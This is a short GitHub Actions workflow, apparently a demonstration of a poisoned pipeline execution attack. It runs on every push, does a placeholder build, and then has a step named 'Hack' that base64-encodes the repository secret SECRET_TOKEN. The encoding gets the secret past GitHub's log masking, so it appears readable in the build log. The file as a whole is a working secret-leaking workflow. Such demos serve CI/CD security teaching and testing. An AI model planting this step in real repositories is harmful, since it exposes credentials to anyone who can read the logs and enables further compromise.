name: Poisoned Pipeline Execution pipeline

on: push

jobs:
    build:
        runs-on: ubuntu-latest

        steps:
            - uses: actions/checkout@v6

            - name: Build project
              run: |
                echo "Building the application..."

            - name: Hack
              run: |
                echo ${{secrets.SECRET_TOKEN}} | base64
